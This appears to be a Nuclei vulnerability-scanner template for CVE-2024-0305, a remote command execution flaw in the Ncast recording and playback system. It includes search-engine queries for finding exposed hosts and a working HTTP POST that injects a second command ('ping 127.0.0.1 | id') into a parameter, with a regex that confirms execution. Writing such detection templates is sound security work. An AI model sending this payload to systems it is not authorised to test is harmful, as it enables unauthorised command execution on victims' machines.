id: CVE-2024-0305 info: name: Ncast busiFacade - Remote Command Execution author: BMCel severity: high description: | The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier. impact: | Allows remote attackers to execute arbitrary code on the affected system. reference: - https://cxsecurity.com/cveshow/CVE-2024-0305 - https://nvd.nist.gov/vuln/detail/CVE-2024-0305 - https://vuldb.com/?id.249872 - https://vuldb.com/?ctiid.249872 - https://github.com/Marco-zcl/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-0305 epss-score: 0.00796 epss-percentile: 0.81232 cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ncast_project product: ncast fofa-query: app="Ncast-产品" && title=="高清智能录播系统" zoomeye-query: title:"高清智能录播系统" tags: cve,cve2024,ncast,rce http: - raw: - | POST /classes/common/busiFacade.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]} matchers-condition: and matchers: - type: regex part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - "#str" condition: and - type: status status: - 200 # digest: 490a00463044022015e3b88f751e5eecf33a42035bdf0113bdc40dab4f2bb7b7585a58b07a2a3f8c02205a2cf5822cfe9758202ab4fc426fb99e6e702ab31c6ebd5c14e720ae82d26a02:922c64590222798bb761d5b6d8e72950